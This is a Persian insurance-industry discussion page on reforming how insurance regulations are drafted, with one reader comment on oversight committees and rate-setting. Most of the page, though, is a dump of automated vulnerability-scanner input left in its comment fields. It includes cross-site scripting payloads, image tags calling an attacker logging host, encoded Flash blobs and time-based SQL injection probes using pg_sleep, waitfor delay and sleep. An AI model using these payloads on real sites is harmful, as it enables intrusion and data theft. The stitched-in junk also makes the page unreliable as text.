جمع بندی نظرات اتاق فکر شماره 10

(حذف اتکایی اجباری در قانون برنامه ششم)

 

 

اتاق فکر مجازی - شماره 11

فعاليت بخش خصوصي در صنعت بيمه در چند سال گذشته روند رو به رشدي داشته است. علاوه بر شركت هاي جديدالتاسيس، سه شركت دولتي نيز خصوصي شده اند. با وجود سهم قابل توجه بخش خصوصي از پرتفوي صنعت بيمه، اين حوزه اثرگذاري خاصي بر روند اصلاح نهادي و تدوین مقررات صنعت ندارد. مطابق با نظر بسياري از خبرگان صنعت بيمه، از جمله حوزه هايي كه با تغييرات صنعت بيمه تطبيق نيافته است، تركيب نهاد ناظر به طور عام و شورايعالي بيمه به طور خاص مي باشد. تركيب شورايعالي بيمه، جايگاه اثرگذاري را براي بخش خصوصي پيش بيني نكرده است. نارضایتی شرکتهای بیمه از مقررات حرفه ای موجود، بسته بودن محیط کسب و کار، عدم حمایت مقررات موجود از رقابت، وجود تبعیض در مقررات و سیطره تفکر دولتی بر صنعت بیمه، از جمله مشکلات عمده صنعت بیمه در حوزه تدوین مقررات و قانون گذاری است. 


به نظر شما چگونه می توان ساختار تدوین مقررات صنعت بیمه را اصلاح کرد؟


احسان اسدالهی

با سلام به نظر شما چگونه می توان ساختار تدوین مقررات صنعت بیمه را اصلاح کرد؟ در هر نظام و سازمانی در هنگام وضع مقررات، کمیته ای تشکیل خواهد شد که برنامه های عملیاتی توسط ایشان رصد گردد. گزارش گیری شود و در صورت هر گونه بروز خطا و بی قانونی، مانع ادامه عملیات گردد. متاسفانه در بسیاری از سازمان ها چنین موضوعی اصلا مورد توجه قرار نمی گیرد. در صورتی که می توان با تشکیل یک کمیته عالی نظارت با اختیارات مناسب مقررات وضع گردد و پیاده سازی شود و در حین عملیاتی شدن آن، مشکلات آن رفع و برای بهبود روند آن، برنامه های تازه ابلاغ گردد. مورد دوم و یکی از اساسی ترین موارد در صنعت بیمه نرخ گذاری متنوع شرکت های بیمه می باشد که متاسفانه هیچ قانونی و سازمان نظارتی بر آن نظارت ندارد.که می بایست از طرف بیمه مرکزی حداقل نرخ ها اعلام گردد و از طرف همان سازمان مورد بررسی و نظارت قرار گیرد. با تشکر فراوان احسان اسدالهی

qowcdjxa<img sRc='http://attacker-924468/log.php?

1

qowcdjxa<ifRAme sRc=958502.com></IfRamE>

1

qowcdjxa_lrBuE <ScRiPt >prompt(970835)</ScRiPt>

1

qowcdjxa}body{acu:Expre/**/SSion(prompt(990781))}

1

qowcdjxa<img<!-- --> src=x onerror=alert(948075);//><!-- -->

1

[url=http://www.vulnweb.com][/url]

1

<a HrEF=jaVaScRiPT:>

1

<a HrEF=http://www.vulnweb.com></a>

1

qowcdjxa<input autofocus onfocus=prompt(971779)>

1

1

qowcdjxa<ScRiPt>prompt(920692)</sCripT>

1

qowcdjxa\u003CScRiPt\u003Eprompt(915637)\u003C/sCripT\u003E

1

qowcdjxa<ScRiPt%20>prompt(985494)</sCripT>

1

qowcdjxa<img/src=">" onerror=alert(958209)>

1

qowcdjxa<img src=xyz OnErRor=prompt(926962)>

1

qowcdjxa<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982004)>

1

qowcdjxa<body onload=prompt(979863)>

1

qowcdjxa<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='971281'>

1

qowcdjxa<div style=width:expression(prompt(970417))>

1

qowcdjxa<isindex type=image src=1 onerror=prompt(969495)>

1

qowcdjxa%3Csvg%20onload%3Dprompt(985330)%3E

1

qowcdjxa<svg

1

qowcdjxa<video><source onerror="javascript:prompt(961185)">

1

qowcdjxa<ScRiPt >prompt(929233)</ScRiPt>

1

qowcdjxa<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988231></ScRiPt>

1

qowcdjxa<ScRiPt >prompt(935562)</ScRiPt>

1

qowcdjxa%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%70%72%6F%6D%70%74%28%39%39%32%39%31%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1

qowcdjxa<script>prompt(919092)</script>

1

qowcdjxa<ScRiPt >prompt(927946)</ScRiPt>

1

CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%26%1b%d9%8e%117%a0%a2%dc%82%8a%1br%04X;%21S%8c%fe%cc%9b%f9%ff%aa%cb7Jq%af%7f%ed%f2.%f8%01>%9e%18p%c9c%9al%8b%aczG%f2%dc%beM%ec%abdkj%1e%ac%2c%9f%a5(%b1%eb%

1

acux8Jmo%F0%9D%8C%86ucax8Jmo

1

acux2082%C0%BEz1%C0%BCz2a%90bcxuca2082

1

acu10201%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10201

1

qowcdjxa_903938

1

'"()&%<acx><ScRiPt >prompt(954385)</ScRiPt>

1

qowcdjxa'"()&%<acx><ScRiPt >prompt(912418)</ScRiPt>

1

qowcdjxa

1

qowcdjxa

1

qowcdjxa

1

cpbxmvms

1<img sRc='http://attacker-981881/log.php?

cpbxmvms

1<ifRAme sRc=940135.com></IfRamE>

cpbxmvms

1_6EOxp <ScRiPt >prompt(936805)</ScRiPt>

cpbxmvms

1}body{acu:Expre/**/SSion(prompt(976415))}

cpbxmvms

1<img<!-- --> src=x onerror=alert(916602);//><!-- -->

cpbxmvms

[url=http://www.vulnweb.com][/url]

cpbxmvms

<a HrEF=jaVaScRiPT:>

cpbxmvms

<a HrEF=http://www.vulnweb.com></a>

cpbxmvms

1<input autofocus onfocus=prompt(915489)>

cpbxmvms

cpbxmvms

1<ScRiPt>prompt(972137)</sCripT>

cpbxmvms

1\u003CScRiPt\u003Eprompt(950316)\u003C/sCripT\u003E

cpbxmvms

1<ScRiPt%20>prompt(956777)</sCripT>

cpbxmvms

1<img/src=">" onerror=alert(958029)>

cpbxmvms

1<img src=xyz OnErRor=prompt(939169)>

cpbxmvms

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(964711)>

cpbxmvms

1<body onload=prompt(977487)>

cpbxmvms

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='915020'>

hcjvkvhb

1

hcjvkvhb

1

cpbxmvms

1<div style=width:expression(prompt(956817))>

cpbxmvms

1<isindex type=image src=1 onerror=prompt(990190)>

cpbxmvms

1%3Csvg%20onload%3Dprompt(991285)%3E

cpbxmvms

1<svg

cpbxmvms

1<video><source onerror="javascript:prompt(966862)">

cpbxmvms

1<ScRiPt >prompt(921897)</ScRiPt>

cpbxmvms

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912197></ScRiPt>

cpbxmvms

1<ScRiPt >prompt(952651)</ScRiPt>

cpbxmvms

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%70%72%6F%6D%70%74%28%39%39%37%31%30%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

cpbxmvms

1<script>prompt(959707)</script>

cpbxmvms

1<ScRiPt >prompt(988298)</ScRiPt>

cpbxmvms

CWS%07%0e000x%9c%3d%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP%22%05D%8bF%8e%0bG%26%1b%d9%8e%117%a0%a2%dc%82%8a%1br%04X;%21S%8c%fe%cc%9b%f9%ff%aa%cb7Jq%af%7f%ed%f2.%f8%01>%9e%18p%c9c%9al%8b%aczG%f2%dc%beM%ec%abdkj%1e%ac%2c%9f%a5(%b1%eb%89T%c2Jj)%93%22%dbT7%24%9c%8fH%cbD6)%a3%0bx)%ac%ad%d8%92%fb%1f%5c%07C%ac%7c%80Q%a7Nc%f4b%e8%fa%98%20b_%26%1c%9f5%20h%f1%d1g%0f%14%c1%0a%5ds%8d%8b0Q%a8L<%9b6%d4L%bd_%a8w%7e%9d%5b%17%f3/%5b%dcm%7b%ef%cb%ef%e6%8d:n-%fb%b3%c3%dd.%e3d1d%ec%c7%3f6%cd0%09

cpbxmvms

acu8Ugn5%F0%9D%8C%86uca8Ugn5

cpbxmvms

acux10988%C0%BEz1%C0%BCz2a%90bcxuca10988

cpbxmvms

acu2535%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2535

cpbxmvms

1_908038

cpbxmvms

'"()&%<acx><ScRiPt >prompt(939235)</ScRiPt>

cpbxmvms

1'"()&%<acx><ScRiPt >prompt(965018)</ScRiPt>

ethylsuo

1

eaGLwjXe'));select pg_sleep(4); --

1

9fgn94pz');select pg_sleep(4); --

1

feFuaiUX';select pg_sleep(4); --

1

(select convert(int,CHAR(65)))

1

UacYwkKb')); waitfor delay '0:0:12' --

1

1

2DPba0ZC'); waitfor delay '0:0:12' --

1

1

629KOlhl'; waitfor delay '0:0:8' --

1

JyI=

1

1 waitfor delay '0:0:8' --

1

@@HwD1Y

1

(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/

1

1

1

if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/

1

\

1

-1" OR 2+151-151-1=0+0+0+1 --

1

1'"

1

-1' OR 2+209-209-1=0+0+0+1 or 'fhHqIpc0'='

1

ethylsuo

1

-1' OR 2+680-680-1=0+0+0+1 --

1